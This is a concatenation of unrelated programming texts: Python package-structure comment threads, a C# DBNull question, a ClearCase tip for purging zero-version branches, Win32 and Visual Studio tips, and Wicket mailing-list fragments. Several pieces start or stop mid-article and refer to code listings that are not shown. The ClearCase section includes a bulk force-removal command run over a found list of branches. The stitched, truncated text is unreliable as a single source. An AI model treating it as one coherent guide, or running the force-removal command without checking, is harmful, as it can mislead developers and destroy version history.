As a rule, never ever ever ever EVER manipulate sys.path to solve Python import issues. It has some pretty serious and nasty side effects that can break other programs. You shouldn't invoke modules within a package like this. Instead, I'd recommend adding command-line argument support to your __main__.py, via argparse.
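A minimal sketch of what such an argparse-driven __main__.py could look like (all names here are placeholders, not the actual project's code):

```python
# A hypothetical cmake_project_creator/__main__.py using argparse.
import argparse

def create_project(name):
    """Stand-in for the real work the package would do."""
    return f"created project {name!r}"

def main(argv=None):
    # argv=None lets callers (and tests) pass arguments explicitly,
    # while `python3 -m cmake_project_creator demo` falls back to sys.argv.
    parser = argparse.ArgumentParser(prog="cmake_project_creator")
    parser.add_argument("name", help="name of the project to create")
    args = parser.parse_args(argv)
    return create_project(args.name)

print(main(["demo"]))  # created project 'demo'
```

The `argv=None` default is a common pattern: it keeps `main()` testable without touching `sys.argv`.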
With __main__.py becoming the dedicated entry point, you should update it further to have a dedicated main() function, like this: The sole entry point to your package should be python3 -m cmake_project_creator, or an entry point script that invokes cmake_project_creator.main().

Ok, thanks. Yes, I've already been using argparse to get the command-line arguments. So one option is to use the -m option, and the other way I managed to make it work is to add the repo root to the PYTHONPATH, which could be done by a setup.py, and most probably it would be OK to have it in a virtualenv. Thanks once more!

Well, like I said, changing the path is always wrong. Yes, even in a virtualenv, especially since you can't guarantee that it'll always be run in one by another user. So, you only have one option, being the one I described. But, shrug, I've said my piece.

I got your point, and at the same time, in general, I don't believe in "having only one option". My problem with invoking a product with -m is twofold. One, it's not at all user-friendly, and the other is that it's leaking an abstraction: the product is implemented as a module with that name. Following your recommendation not to change any path variable, I found two ways to overcome this. 1) I wrap the python3 -m cmake_project_creator into a shell script. As such, users don't have to bother with -m, or even with prepending the module or script name with python3. On the other hand, it's not very portable (what about Windows users, for example?); this might or might not be acceptable. In my case, it would be. 2) I managed to invoke the module with runpy.run_module("cmake_project_creator", run_name='__main__') from another Python script that, given a correct shebang, I can simply call as ./run.py <args>. To me this seems ideal, as I keep the invocation (from a user perspective) as simple and as portable as possible, and I encapsulate both the module name and the fact that the product is implemented as a module.
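The runpy approach in option 2 can be sketched end-to-end; everything here (package name and contents) is a stand-in built on the fly so the example is self-contained:

```python
import runpy
import sys
import tempfile
from pathlib import Path

# Build a throwaway package shaped like the project under discussion
# (names and contents are illustrative, not the real cmake_project_creator).
root = Path(tempfile.mkdtemp())
pkg = root / "cmake_project_creator"
pkg.mkdir()
(pkg / "__init__.py").write_text("")
(pkg / "__main__.py").write_text(
    "def main():\n"
    "    print('creating project...')\n"
    "\n"
    "if __name__ == '__main__':\n"
    "    main()\n"
)

sys.path.insert(0, str(root))  # for this demo only; a real launcher
                               # script simply sits next to the package

# This is what `python3 -m cmake_project_creator` does, and what a
# simple ./run.py launcher can invoke:
result = runpy.run_module("cmake_project_creator", run_name="__main__")
```

With `run_name="__main__"`, the package's `__main__.py` sees `__name__ == '__main__'`, so its guard fires just as it would under `python -m`.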
PS: The product is going to be completely free; with the word "product" I only want to emphasize that it's meant to be used by people who might not even know what python -m is, or Python at all.

That's why you have an entry point script, or even several, as I alluded to earlier. You can use your setup.py to provide those, and those scripts can even be named such as you describe. But editing the Python path is still always wrong, for technical reasons. Python quite often is meant to have only one right way of doing something. The language is built that way. As I haven't yet been able to write the article on setup.py, please read this article by Chris Warrick: chriswarrick.com/blog/2014/09/15/p...

Thanks for the recommendation. I'm definitely going to read it, as that's pretty much my next thing to do: understand what I need to put in the setup.py. Thanks again!

Hi! Firstly, great article. This has been one of the clearest examples of how it should be done. Thanks. I am not sure whether this is an edge case, but I have a structure that looks like this: Both generate_data.py and send_data.py reference functions in local_utilities.py. The issue I have is that, more often than not, I would be calling send_data.py or generate_data.py directly. I know that if I call either of them specifically, I will need to add a reference to be able to import local_utilities. Does this go against generally accepted practice? Would it be better to either separate them into different projects (I would like to keep all the code together) or use an argparser in __main__ and call the respective module using args? Thanks, Ashley

Hi Ashley, sorry for the tremendous delay in reply. So, just to be clear, you're wanting to be able to call generate_data.py and send_data.py directly, and those are supposed to be able to import a module from elsewhere in the project? If so, I would actually consider why you want to execute those modules directly.
If you're simply wanting to be able to execute the two separately from the command line, it may be worth fleshing out __main__.py to accept a command-line argument, so python3 -m generateandsend send or python3 -m generateandsend generate will execute what you want. That'll also be the easiest solution. That way, you're always executing the top-level package (generateandsend).

In fact, I'm not entirely sure off the top of my head how to get multiple projects to talk to one another within a shared directory! I know it has to do with PYTHONPATH, but I think that will necessitate more research on my part. ;)

Thanks for replying (& no problem on the delay - we all have a life to live!). I have thought about this more and agree - why is it that I want to call them separately, when a parameter will suffice? So, I have abandoned the idea and gone with the python3 -m generateandsend generate approach. Cheers for the reply though. Appreciated. I also have one more question - if I wanted to include an ini/configuration file in a resources folder, how would I import it? Thanks
I believe that will work? You'll have to check how config.read()handles an absolute path. Beautiful. Thanks. I had to massage it a little and remove os.pardir, as it was giving me a false directory on my windows machine ( C:\tmp\generateandsend\..\Resources\generateandsend.ini). The resultant path variable now looks like: I just need to test this on my Linux box Cheers again. Send the bill to...... 😉 Hi Jason, nice article! Just a question: I've noticed you didn't talk about namespace packages. Is it because it might be outside the scope of a "dead simple" intro? I'm mentioning it because I believe they are a simpler concept for a new developer, as in: folders are packages, if you need initialization code for such package, add a __init__.py, otherwise you can't totally ignore the file. I'm over simplifying here of course. Thank you! That was something I actually didn't know about. Thanks for the link! It is probably more advanced than I want to go in the article series, but thanks for parking it in a comment anyhow. I'll look at this again later, and see if it might be worth adding to the guide after all. Thank you! An example: You can read more about it here. My tree example: ---src init.py main.py ------game ---------cards98.py ------reinforced ---------rl_agent.py ------supervised Readme.md License.md I can not reach parent module, from rl_agent.py I added some init.py but it does not solves. I have tried: from game.cards98 import GameCards98 from src.game.cards98 import GameCards98 And all I got is ModuleNotFoundError: No module named 'src' This works fin in pycharm, but not in idle :/ This structure should work: You need __init__.pyunder each directory that you want to use as a package. Then, from rl_agent.py, you should be able to use this import: I know it should work, but it does not. I got __init__.pyeverywhere and __main.py__in top level. Do I need to run it with -m param? I am definitely missing something. 
I was running scripts from top level to combine modules, but It can get messy sometimes :P This is my repo: Github Cards98 It shouldn't be messy. But, yes, you'd need to invoke your top-level package (not your top-level script.) By the by, I recommend renaming srcto your project name, cards98, and then renaming the subpackage by the same name to something like game. Yes, now it is working. python -m cards98 Well... but only for invoking top level in console. It does not work for normal execution, like clicking 2 times __main.py__with mouse. This also makes debugging and testing harder, cause I have to change it always in __main__.py. Where can I use it? I think it just complicates everything. Thanks for help in understanding this This is, to my knowledge, the official (and only) way to structure a Python project. There are two to create an executable file to start everything. Option 1: Native Script Many Python projects offer a Bash script (on UNIX-like systems) or a Windows .batfile that will run the python3 -m cards98command. I see this a lot. Option 2: Python Script This is the method I'd recommend, as it's the most portable. Outside of your top-level package, you can write a separate Python script, such as run.pyor cards98.py, and then use that to execute your main function. For example, in cards98/__main__.py, you can put this... And then, outside of the cards98package, create the file cards98.py, with the following: To start your Python application, just double-click cards98.py. P.S. Thanks for bringing up this situation. I realized I never addressed it in the book! Great introduction. I have one question: you have testsinside the project directory, while this guide places both docsand testsinto the git root. Are there any up- or down-sides to either of the choices? My method just makes the imports a lot easier. 
You'll notice that the guide you linked to requires some complex imports for the tests to work, whereas my approach requires nothing of the sort, since the tests are part of the module. I suppose if you absolutely don't want to ship tests as part of your finished product, that might justify the other approach. That said, I prefer to always ship tests in the project; it makes debugging on another system a lot more feasible. Good point, thanks. So, in your approach, how do you import, let's say, game_item.py from test_game_item.py? And does it then have to be run from a specific folder (omission-git, omission-git/omission/, or omission-git/omission/tests), or does it work from all of the above? Within omission/tests/test_game_item.py, I would import that other module via... I always run python -m omission or pytest omission from within omission-git. Thank you so much for this article. It's hard to overstate how helpful this is for someone who feels relatively competent at the language but completely inexperienced at building something sane-looking or structured appropriately. Nice article! While this is probably beyond the scope of this article, one useful addition for those that need to create packages frequently would be to look into using cookiecutter. It lets you create a "package template". While these templates can be simple, they can also include support for many dev tools such as docker, travis-ci, sphinx, doctests (via pytest/nose/etc), and so on. Once the cookiecutter template is ready, you run a quick wizard and it generates the project directory/files for you. There are also a bunch of templates already available, some of which are specialized for specific tasks (such as data analysis). For more info: cookiecutter.readthedocs.io/en/lat... github.com/audreyr/cookiecutter Thanks for this article! It is very useful for beginners. I would like to suggest mentioning wemake-python-styleguide in one of the future articles.
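Circling back to "Option 2" from the thread above, since both of its snippets were elided in the extracted comments: here is a hedged sketch of what they plausibly look like (the main() body and its printed message are invented; the cards98 package and a run.py launcher beside it follow the thread's naming). The demo writes the files to a temporary directory and then invokes the launcher the same way a double-click would.

```python
import os
import subprocess
import sys
import tempfile

root = tempfile.mkdtemp()
os.makedirs(os.path.join(root, "cards98"))
open(os.path.join(root, "cards98", "__init__.py"), "w").close()

# cards98/__main__.py: the real entry point ('python -m cards98' uses it too)
with open(os.path.join(root, "cards98", "__main__.py"), "w") as f:
    f.write("def main():\n"
            "    print('cards98 started')\n"
            "\n"
            "if __name__ == '__main__':\n"
            "    main()\n")

# run.py: sits OUTSIDE the package. A plain script puts its own directory
# on sys.path, so the package import works regardless of where it's launched.
with open(os.path.join(root, "run.py"), "w") as f:
    f.write("from cards98.__main__ import main\n\nmain()\n")

result = subprocess.run([sys.executable, os.path.join(root, "run.py")],
                        capture_output=True, text=True)
print(result.stdout.strip())  # -> cards98 started
```

Note that the launcher imports main from cards98.__main__ and calls it explicitly; the `if __name__ == '__main__'` guard in __main__.py still lets `python -m cards98` work unchanged.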
In my practice, it is very helpful for beginners, since it enforces insanely strict rules to structure and clean your code. That's what stimulates learning progress! Anyway, great series. Waiting for the next articles. Such a great article, thank you very much. I've just dived into Python, having used multiple languages before. But these are exactly the explanations needed by Python newcomers to get a better understanding of how things work in Python. Thanks a lot for your article; this was exactly what I was looking for, since this topic is skipped by basically everyone else... You said that the topic of importing app.py instead of using main.py is out of scope... Do you plan on writing up something that picks this topic up? I'm quite interested in the reasoning behind this approach; do you have any reference, by chance? I don't think there are any formal guidelines on the topic, to be honest. My use of app.py has a lot to do with separation of concerns; I put my GUI startup code in app.py, and my non-GUI startup code in __main__.py. I can't really point to something that says this is "right" or "wrong"...it just works out pretty well for my project. It's something that has to be considered on a project-by-project basis, really. Finally, a straightforward description that is really well explained. As a Java developer getting into Python, I've always been frustrated when asking Python devs about solid source code structure for Python projects that makes sense and won't lead to the apparent mess of what I've seen in lots of Python code (they usually just say I'm being too much of an uptight "Java" dev... and that I should just create a .py file and start "hacking" away). Cheers, Jay. I certainly apologize on behalf of the Python community for your being treated like that! "Just start hacking" is, I believe, what someone says when they really don't know the answer, and are afraid you're going to find them out.
In my experience, the #python Freenode IRC room isn't like that most of the time. We have frequent conversations about proper Python project structure; most of this article came out of those conversations. Of course, as with any community, it depends on which people you encounter, but I would recommend checking that room out in general. That's an excellent explanation. I can understand the project structure better with this. Thanks for your article, Jason. Looking forward to reading the following ones :D Nice article, you dropped a _ in this snippet: Just so you know! Thanks for catching that! I just went back and fixed it. :) I've just started learning to code. I love this series. Thank you for making this. Nice article, definitely gives me some things to think about as I approach my next project (my first 'real' project, so to speak). Hi Jason, when will you publish the next part of the tutorial? I don't have a specific schedule in mind, and I'm balancing a few things, but I hope to have the next part published later this week, or early next. That said, I cannot promise any particular timeline beyond that. It all depends on how some other pieces of my life go. It might be really quick, or I might only post every other week. Can't say for sure. Given how popular this series is, though, it's a very high priority of mine to update and finish. Excellent guide! Thanks! Nice article, Jason. Is the code shown in this article available somewhere? I'd like to check some of the inner details. Here you are, although I'll warn you that it's being heavily restructured at the moment. A game with a deceptively difficult premise: find the missing letter. Omission A game where you find what letter has been removed from a passage. Content Notes The content for this game has been derived from "Bartlett's Familiar Quotations". For brevity, the source of each quote has been omitted - both title and author. Sections previously italicized have been replaced with CAPS for easier display.
Passages have been trimmed and rearranged to be no more than 4-5 lines. Authors Thanks to the following: Dependencies Installing To install from source, see BUILDING.md. Contributions We do NOT accept pull requests through GitHub. If you would like to contribute code, please read our Contribution Guide. All contributions are licensed to us under the MousePaw Media Terms of Development. License Omission is licensed… This series has been awesome, Jason, thanks! Nice article!!! I wonder where to place the venv directory in this project structure? venv always belongs at the top-most level of the repository (make sure you untrack it via .gitignore!), or else outside of the repository altogether. Very nice article!
After I retrieve any scalar value from the database, it's my job to write code such as this for nullable fields:

cmd.ExecuteScalar() == DBNull.Value ? 0 : (int)cmd.ExecuteScalar()

However, I can't stand this, since it executes the ExecuteScalar statement two times. That is an extra visit to the server, and for the sake of performance I'd rather not do that. Is there any way I can eliminate the extra ExecuteScalar() call?

Write yourself an extension method on the SQL command:

public static T ExecuteNullableScalar<T>(this SqlCommand cmd) where T : struct
{
    var result = cmd.ExecuteScalar();
    if (result == DBNull.Value) return default(T);
    return (T)result;
}

Usage becomes:

int value = cmd.ExecuteNullableScalar<int>();

Or just use a variable to cache the result:

var o = cmd.ExecuteScalar();
return o == DBNull.Value ? 0 : (int)o;

object o = cmd.ExecuteScalar();
return (o == DBNull.Value) ? 0 : (int)o;
Purging Zero-Version-Only Elements in ClearCase George F. Frazier georgefrazier@yahoo.com An annoyance with the Windows version of Rational ClearCase is that it is easy to accidentally create a branch of an element whose only version is 0. If you use ClearCase for version control, you'll know that version 0 of an element has exactly the same contents as its parent. This seems harmless. But consider this typical config spec:

element * CHECKEDOUT
element * .../mybranch/LATEST
mkbranch mybranch
element * .../myparentbranch/LATEST
element * /main/LATEST
end mkbranch

Suppose element myfile.cpp has the following versions:

myfile.cpp@@/main/1
myfile.cpp@@/main/myparentbranch/1
myfile.cpp@@/main/myparentbranch/mybranch/0

Here myfile.cpp@@/main/myparentbranch/mybranch/0 branches from myfile.cpp@@/main/myparentbranch/1. Now in a different view, suppose you or someone else creates myfile.cpp@@/main/myparentbranch/2. In this case, 99 percent of the time you want to select this new version, but your config spec still selects myfile.cpp@@/main/myparentbranch/mybranch/0, which is equivalent to myfile.cpp@@/main/myparentbranch/1! ClearCase site administrators can configure the installation to make this less likely to occur, but developers usually don't have "super-user" access to large ClearCase installations. I've found that this situation is particularly problematic on Windows. By default, if you uncheckout the first version of an element on a new subbranch, you are left with the zero version. This is not a problem: You can just delete the subbranch if you remember to. However, I've run into thornier situations when using the GUI version of the Windows ClearCase Merge Manager: - Invoke FindWizard and accept the defaults; this includes "Automatically Merge Directories." - Let the merge manager find elements to merge, and then, before doing the merge, exit the merge manager (this is a reasonable activity; sometimes you just want to know what the merge candidates are).
- Notice that many directories might be checked out after exiting. Now use the Find Checked Out Files tool to find and then uncheckout those directories. Now all new directories on the "from target" of the merge have zero-only versions of mybranch. Depending on what you're doing, this could be thousands of elements. You can compound this by actually running the entire merge and then bailing out without checking in the files. So what's the fix? If you can convince your configuration management team to provide tools that automatically delete these zero-version items, then you are in great shape. If you're on your own, though, you need to purge your view of those troublesome entities. Run the following command to find all zero-version elements:

cleartool find -avobs -branch '{brtype(mybranch) && !(version(.../mybranch/1))}' -print > c:\files.txt

This will find all elements with no version 1 on mybranch. (If you read closely, you'll notice it doesn't do the right thing if you have removed the 1 version of an element that already has versions greater than or equal to 2; this is a rare situation, though.) Once finished, it's simply a matter of using rmbranch to nuke the elements (make sure you know what you're doing here!). There are many ways to do that; since I run the MKS Toolkit, I execute the following from a command window:

cleartool rmbranch -f `cat c:\files.txt`
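If you don't have the MKS Toolkit, the same batching can be done in plain Bourne shell. This is a hedged sketch, not part of the original tip: the purge_zero_branches name and the CLEARTOOL override are invented for illustration, and setting CLEARTOOL=echo gives a dry run before anything is actually removed.

```shell
# Overridable so the loop can be dry-run (CLEARTOOL=echo) before the real purge.
CLEARTOOL="${CLEARTOOL:-cleartool}"

purge_zero_branches() {
    # $1: the file produced by the 'cleartool find ... -print' step above
    while IFS= read -r element; do
        if [ -n "$element" ]; then
            "$CLEARTOOL" rmbranch -f "$element"
        fi
    done < "$1"
}

# Usage (after reviewing the list!):
#   purge_zero_branches /c/files.txt
```

Reading the list line by line, rather than substituting the whole file onto one command line, also avoids argument-length limits when thousands of elements are affected.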
Often in such cases, however, there is a requirement to provide more detailed feedback by "sprintf-ing" information into the MessageBox text, as in Listing 2. The situation gets even worse when you want to load a string as the format string or the title. The (pretty obvious) answer to this is a function, MessageBox_printf(), which I wrote after getting very tired of such verbosity. Presented here is the 32-bit ANSI version, using the ANSI versions of the requisite API functions (see Listing 3). The function effectively "sprintfs" the variable arguments, if any, into a buffer according to the format string lpszFmt, and then displays a message box with the resultant buffer as the message box text using the given hwnd, lpszTitle, and uType parameters. If either or both of the lpszFmt and lpszTitle parameters are actually string resource ids (by dint of having 0 in their upper 16-bits), then they are loaded from the given instance handle hinst. If hinst is NULL, then it is derived either as the GWL_HINSTANCE attribute of the given window (if any), or otherwise as the instance handle of the calling process. The function returns the MessageBox() return value, not that of the wsprintf() call, so that the function can be used to interrogate the user in the same way as MessageBox() itself. The implementation is pretty straightforward. Local buffers are used in order to provide some memory substance to any text strings loaded from the resources. The only notable feature is the sizes of these buffers. wsprintf() will printf a maximum of 1024 destination characters (including NULL), so szText is of that dimension. The sizes of szFmt and szCaption are 768 and 128, respectively. 
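The two steps at the heart of the function, bounded formatting of the varargs followed by the display call, can be sketched portably. This is a hedged illustration, not the article's Listing 3: message_box_printf and show_box are invented names, vsnprintf() stands in for wsprintfA(), and a printf() stub stands in for MessageBoxA() so the sketch compiles without <windows.h>.

```c
#include <stdarg.h>
#include <stdio.h>

/* Illustrative stand-in for the MessageBoxA() call, so the shape of the
 * wrapper can be shown (and compiled) anywhere. Returns the count of
 * characters written, as printf does. */
static int show_box(const char *text, const char *title)
{
    return printf("[%s] %s\n", title, text);
}

/* Format the variable arguments into a bounded local buffer, then hand
 * the result to the display call: the same two steps the article's
 * MessageBox_printf() performs. The 1024 mirrors wsprintf's limit
 * (including the terminating NUL). */
int message_box_printf(const char *title, const char *fmt, ...)
{
    char szText[1024];
    va_list args;

    va_start(args, fmt);
    vsnprintf(szText, sizeof szText, fmt, args);
    va_end(args);

    return show_box(szText, title);
}
```

The real Win32 version additionally resolves string-resource ids for the format and title and forwards the hwnd and uType parameters to MessageBoxA(), as described above.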
These buffer sizes seem arbitrary but are, in fact, derived through trial and error such that this function does not prompt the Visual C++ compiler to insert the _chkstk function (due to the stack potentially exceeding the boundary of the guard page), which would preclude the practice (common in my libraries and simple programs) of excluding the C Runtime Library. These limits have not yet caused any restriction of utility in the long time that I've been using these functions. Included in this month's archive is a sample main that exercises the functionality, and a Visual C++ 5.0 project. Customizing the Visual Studio IDE (VS6 and VS.NET) Glenn Pope gpope@ev1.net Most Windows applications (including VS6 and VS.NET) maintain a Most Recently Used (MRU) list that allows you to open files or projects without having to search around for the location of source files. This is nice until you need to copy the DLL or exe that you just compiled. Once done, you have to fire up Windows Explorer (or one of its brethren) and navigate to your project directory. If you are like me, your project directories can be nested several levels deep and possibly on differing drives. Can you say network storage? With mapped drives and multiple code repositories, locating the source can be frustrating. Don't count on the MRU list either because it will only show the name of the project without the path once the project is opened. I could write a script to do this, or add a postbuild step, but I like using Explorer because I often do a bunch of cleanup and copying that I can't easily automate when I'm iterating through a build/debug/install process. A solution that works for me is to customize Visual Studio with a simple button that launches Explorer with the target directory preselected.
While not profound in and of itself, it is worth reviewing how to do this since, with a few customized menu options or tool buttons, you can standardize a build process across an entire team of programmers. For the simple case of launching Explorer, start by pulling down the Tools menu and selecting External Tools. Click the Add button, and enter:

Title: Explorer Target
Command: explorer.exe
Arguments: /e,/Select,$(TargetDir)

Click OK and you now have an external tool you can invoke from the Tools menu. While we are reviewing the ABCs of Visual Studio IDE customization, we can take it one step further and add the command to the toolbar by selecting Customize from the Tools menu. On the Commands tab, in the listbox on the left, select Tools. In the listbox on the right, scroll down until you find External Command xx, where xx is the index number of your new command (start counting at 1). Select the proper External Command xx with the left mouse button and drag it onto your toolbar in the IDE. The text will update once you close all customize dialogs. Of course, there is nothing magic about using this process to launch Explorer; you can customize the IDE as necessary based on your requirements. This can be a particularly effective way to train a new programmer about a particular build system. Just provide buttons for each step they need to perform after building, such as producing an install, firing up test or profiling tools, using source code control, running regression tests, etc. Order these buttons from left to right based on the natural order in which the steps should be taken, and you've turned Visual Studio into a visual README file of your configuration management process.
There are circumstances, however, where the use of the built-in support is inadequate or undesirable. This is because the Additional DLL's information is stored in Visual Studio in the corresponding .opt file for a particular workspace. If part of one's development practice is to regularly clean out the working directory tree (it is, right?), then this information will be lost. An alternative to this is to store it along with the project workspace in source control. But this is troublesome, not just because the .opt file appears to accrete (often erroneous) content throughout the lifetime of the active project, but also because such an approach would limit the developer(s) sharing this file to a single working directory for the Additional DLLs themselves (which precludes freedom for projects that generate output via relative path). This restriction is onerous for an individual, and positively untenable for most collaborative environments. The solution that has found application in such collaborative circumstances is to force the explicit libraries to be loaded implicitly by the operating system when the application being debugged is loaded. This means that any breakpoints set in a prior execution will remain set (unless the code itself has changed, of course) in a subsequent one. To do this, one must explicitly link in a function exported by each additional DLL. For example, a library BASESTD.dll could export the function: void __stdcall linkBASESTD(void) { } which can be referenced in the application code in the following way: #ifdef _DEBUG static /* Can put in unnamed namespace in C++ */ void func_never_called() { void (__stdcall *_linkBASESTD)(void) = linkBASESTD; } #endif /* _DEBUG */ This has no run-time cost, and only links in for debug builds. It has the effect of linking to BASESTD.dll, which is, therefore, implicitly loaded, and its breakpoints are preserved. 
This technique is very useful for solving the breakpoint issue in collaborative projects, but it should be pointed out that its use does change program behavior, due to the loading of all such linked libraries at application load. Subtle library-load ordering issues can be masked. I would therefore strongly recommend disabling the implicit loading prior to moving to a release-testing phase, specifically to detect any ordering issues. George Frazier is a software engineer in the System Design and Verification group at Cadence Design Systems Inc. and has been programming for Windows since 1991. He can be reached at georgefrazier@yahoo.com.
Re: Wicket dropdownchoice onselectionchanged must override or implement a supertype method Right, should probably be something like: protected void onSelectionChanged(SelectOption newSelection) {}; Also, note that SelectOption is generic... Regards, Sebastien. On Tue, Apr 24, 2012 at 8:18 PM, Per Newgro per.new...@gmx.ch wrote: it is because of the @override annotation on a non Re: call onsubmit automatically a setResponsePage; you just have to get the right Page class from the param and maybe construct your PageParameters also... Hope this helps, Sebastien. Re: call onsubmit automatically you want to redirect to. Hope it answers your need. Sebastien. On Mon, Apr 30, 2012 at 12:34 PM, raju.ch raju.challagun...@gmail.comwrote: Thnx for the reply sebastian, but I didn't get the solution what you suggested..Can you please explain it with an example? thanks in advance -- View Re: AutoCompleteField returning null Hi, The feedbackpanel always shows that the value it is getting back from itemField is empty. itemField.getValue or getModelObject will returns empty if it is not in your form... (this is the only reason I see regarding to the code you supplied) Sebastien. On Tue, May 1, 2012 at 3:54 PM Re: AutoCompleteField returning null Oops, I did not saw you was using an AjaxLink... You have to use an AjaxButton instead. Sebastien. On Tue, May 1, 2012 at 5:51 PM, cmagnollay cmagnol...@gmail.com wrote: Well, that is not the case unfortunately. Here is my code as stripped down as I could get it, to still supply information Re: AutoCompleteField returning null () (but not getModelObject, which might return null in that case). Thus, the onSubmit (the one of the form) will not be called (once again, because the form has not been processed), only the button#onSubmit will. Hope this helps, Sebastien. On Tue, May 1, 2012 at 6:51 PM, cmagnollay cmagnol...@gmail.com wrote: Hmm Re: AutoCompleteField returning null failed. Sebastien. 
On Tue, May 1, 2012 at 8:21 PM, cmagnollay cmagnol...@gmail.com wrote: No, this looks very promising. Thank you very much for elaborating. I still do not understand what is different about AutoCompleteTextField that it will not give me back the textual value (getModelObject Re: Wicket 6.0.0-beta1: RangeValidator Issue (NPE) Hi Martin, Here we are: Sebastien. On Thu, May 10, 2012 at 9:38 AM, Martin Grigorov mgrigo...@apache.orgwrote: Guys, Please use Jira for bug reports. On Thu, May 10, 2012 at 9:28 AM, Thomas Götz t...@decoded.de wrote: I can confirm Re: Need help in implementing Ajax form onSubmit. But apart from that, I just would like to tell you that if you need an authentication mechanism, you'll probably better have to use the wicket-auth-roles. All you need to know is here: Regards, Sebastien On Mon, May 14, 2012 at 8:10 Re: Need help in implementing Ajax form And the WICKET AJAX DEBUG mark appears as soon as you are dealing with wicket ajax component. It is not displayed anymore when your configuration changes from development to deployment (web.xml) On Mon, May 14, 2012 at 9:47 PM, Sebastien seb...@gmail.com wrote: Hi kshitiz, Well, looking Re: Need help in implementing Ajax form ? If terget == null then nothing happens in onSubmit() method. - Add some logging (log4j etc.), to your app Regards Wlodek 2012/5/14 Sebastien seb...@gmail.com: And the WICKET AJAX DEBUG mark appears as soon as you are dealing with wicket ajax component. It is not displayed anymore when your Re: Nested Form submitted via ajax clearing fields in outer form Hi, why does it call onFormSubmitted for the root form? Is this the way it has to be programmed for nested forms to work? Well, I think it should not be the case, according to: Regards, Sebastien. On Thu, May 17, 2012 at 4:18 PM, Hill, Joel Re: Access to Page from LoadableDetachableModel Hi, I aggree with Sven. Another option is to pass the panel to the LDM's contructor so you can do a panel.getPage() to get the page. 
Just cast to the appropriate page type and do yourpage.getMyModel(). Best regards, Sebastien. On Wed, May 30, 2012 at 10:32 PM, Sven Meier s...@meiers.net wrote Re: Access to Page from LoadableDetachableModel Well, I don't think so, even it needs to be tested. My guess is that the panel is added to the page (then, serialized). To the LDM's contructor, you will pass 'this' (means, the panel). In the LDM, you will store the reference of that 'this' into a variable. In all case, we always have the Re: Access to Page from LoadableDetachableModel Hello again, I tested in a quickstart and it works. (I just noticed you did not called super.onInitialize()) The code I used: class MyPOJO { public Boolean isSelected() { return true; } } public class HomePage extends WebPage { private static final long serialVersionUID Re: Access to Page from LoadableDetachableModel no problem to have the LDM as a nested class; for the quick start, the LDM was in the MyPanel.java (not nested then, but there is no huge difference strictly java speaking). Regards, Sebastien. On Thu, May 31, 2012 at 1:41 AM, gmparker2000 greg.par...@brovada.comwrote: Thank you so much Re: Filtercolumn and bigdecimal formatter (rowModel); item.add(new MyBigIntegerLabel(componentId, model)); // MyBigIntegerLabel should format your model object as string (using String.format?) properly here } Regards, Sebastien. On Thu, May 31, 2012 at 2:50 PM, Josh Kamau joshnet2...@gmail.com wrote: Shouldnt the filtering Re: Filtercolumn and bigdecimal formatter at DateConverter for help) } return super.getConverter(type); } Regards, Sebastien. On Fri, Jun 1, 2012 at 10:41 AM, Sebastien seb...@gmail.com wrote: Hi, I would have done something like that: public class BigDecimalFilteredPropertyColumn extends Re: Refresh listItem only of listView Hi, Well, you do not tell a much about the issue... 
So, several possible answers are: - You cannot add the listview in the target as it is a repeater, you should add its (or one of its) parent. - If you change the list, is your list a model ? (userTypeDomainList) Regards, Sebastien. On Sat Re: Refresh listItem only of listView to add/remove object), you can set ListView#setReuseItems to true so the re-rendering will be more efficient. Also, * If you nest a ListView in a Form, ALLWAYS set this property to true, as otherwise validation will not work properly.* (setReuseItems javadoc) Hope this helps, Sebastien. On Sat, Jun Re: Panel not getting refreshed... Hi, It's to late to have searchResultPanel.setOutputMarkupId(true); in onSubmit() You need to set this before the first rendering, because ajax need it in order to know how to re-redner the panel. Regards, Sebastien. On Sat, Jun 9, 2012 at 9:56 PM, kshitiz k.agarw...@gmail.com wrote: Hi, I Re: Panel not getting refreshed... re-redner re-render On Sat, Jun 9, 2012 at 10:01 PM, Sebastien seb...@gmail.com wrote: Hi, It's to late to have searchResultPanel.setOutputMarkupId(true); in onSubmit() You need to set this before the first rendering, because ajax need it in order to know how to re-redner the panel Re: Panel not getting refreshed... ()); error = true; } *target.add(searchFeedbackPanel); } Regards, Sebastien. On Sun, Jun 10, 2012 at 8:48 AM, kshitiz k.agarw...@gmail.com wrote: Did u mean this: final SearchResultPanel searchResultPanel = new SearchResultPanel(searchResultPanel Re: Panel not getting refreshed... but result panel is not getting refreshed. It is not even entering in that panel as I have some sysouts in that panel to check... Try to put one sysout in searchResultPanel#onBeforeRender, to check whether the panel is going to be refreshed. Additionally, look at the ajax debug window to see if Re: Panel not getting refreshed... (searchDomain); Also not needed, you already sets the model object at the form's creation. That's about all I see. 
Hope this helps. Sebastien. On Mon, Jun 11, 2012 at 8:29 PM, kshitiz k.agarw...@gmail.com wrote: Please help me I am really not able to understand why it is happening Re: AjaxCallThrottlingDecorator - 1.6 , Duration.ONE_SECOND)); } Best regards, Sebastien. On Tue, Jul 10, 2012 at 1:17 AM, Douglas Ferguson the...@gmail.com wrote: How do you throttle ajax calls in 1.6? Douglas - To unsubscribe, e-mail: users-unsubscr Re: migrating from 1.4 to 1.5 - some images problems Hi Sam, I think you can use this: UrlUtils.rewriteToContextRelative(ui/images/datepicker.png, RequestCycle.get()); It also works in Wicket 6. Regards, Sebastien. On Tue, Jul 10, 2012 at 7:22 PM, Sam Zilverberg samzilverb...@gmail.comwrote: Hi, First let me say that I already searched Re: I think it's time for a new book.... Igor and Co ? +1 too About the found raising, maybe could it be a book project in My Major Company or Kickstarter for instance... Regards, Sebastien. On Fri, Jul 27, 2012 at 9:27 AM, Josh Kamau joshnet2...@gmail.com wrote: What if the developers donate (or do a fund raising... ) to fund the writing Re: enabling and disabling the components afterward, using ajax, you will weed to set setOutputMarkupId(true), or even setOutputMarkupPlaceholderTag(true) if the components starts un-rendered Hope this helps, Sebastien. On Thu, Aug 9, 2012 at 10:53 PM, wicket user samd...@live.com wrote: I was reading about setEnable(false Re: enabling and disabling the components =fName /div /div div wicket:id=test1 div wicket:id=message /div /div Hope this helps, Sebastien. On Fri, Aug 10, 2012 at 12:49 AM, wicket user samd...@live.com wrote: Hi, I tried this . public class MyContainer extends WebMarkupContainer{ public MyContainer(String id, MyVO Re: Jqwicket -jquery-ui-plugins, feel free to make a pull request ! :) Thanks best regards, Sebastien. 
Anecdotal evidence suggests that many developers remain skeptical about the value of Entity Beans, especially prior to the EJB 2.0 specification. Many system designers and developers choose not to invest precious resources in a technology that remains unproven in large-scale deployments.

